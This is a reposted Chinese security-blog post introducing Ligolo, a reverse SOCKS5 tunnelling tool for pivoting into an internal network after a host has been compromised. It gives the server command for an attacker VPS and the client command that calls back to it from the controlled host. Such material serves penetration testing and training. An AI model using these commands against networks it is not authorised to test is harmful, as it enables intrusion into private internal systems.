内网渗透 | 轻量级反向隧道Tools(附下载)
2023-3-2 00:4:16 Author: EchoSec(查看原文) 阅读量:19 收藏

声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。

0x01 工具简介

简单轻量级的反向Socks5代理工具及端口映射工具,所有的流量使用TLS加密,其功能类似于Meterpreter中的Autoroute + Socks4a,但是更加稳定,速度更快。
TLS 1.3 加密隧道多平台 (Windows/Linux/Mac/...)多连接复用 (1 TCP连接传输所有流量)SOCKS5代理

0x02 使用场景

已获取到对方内网一台Windows/Linux/Mac主机权限且该主机可以连接互联网,此时你想要建立一个对方内网的Socks5代理或需要连接内网某个IP地址的某端口。Ligolo 可以帮助你建立代理继续进行内网渗透。

如果已控主机不能访问互联网,可以尝试用另一款工具

https://github.com/FunnyWolf/pystinger

0x03 使用方法

在你的VPS主机中执行服务端

./ligolos_linux_amd64 -p 0.0.0.0:1080

在已控制的内网主机中执行客户端.

ligoloc_windows_amd64.exe -s 192.168.1.120:443

连接建立成功后,此时VPS的127.0.0.1:1080已经建立已控主机的内网Socks5代理。

文章来源:Hack分享吧

0x04 下载地址

点击下方名片进入公众号

回复关键字【Ligolo】获取下载链接


文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MTU3NTY2NA==&mid=2247487237&idx=1&sn=8a77f108cb1b7a70a74845ba2e5f92d3&chksm=fcdf531acba8da0c1174248ec64f08f7b65df9bde7a15d09cac933a8e7e16c18b5f53c7c5f5e#rd
如有侵权请联系:admin#unsafe.sh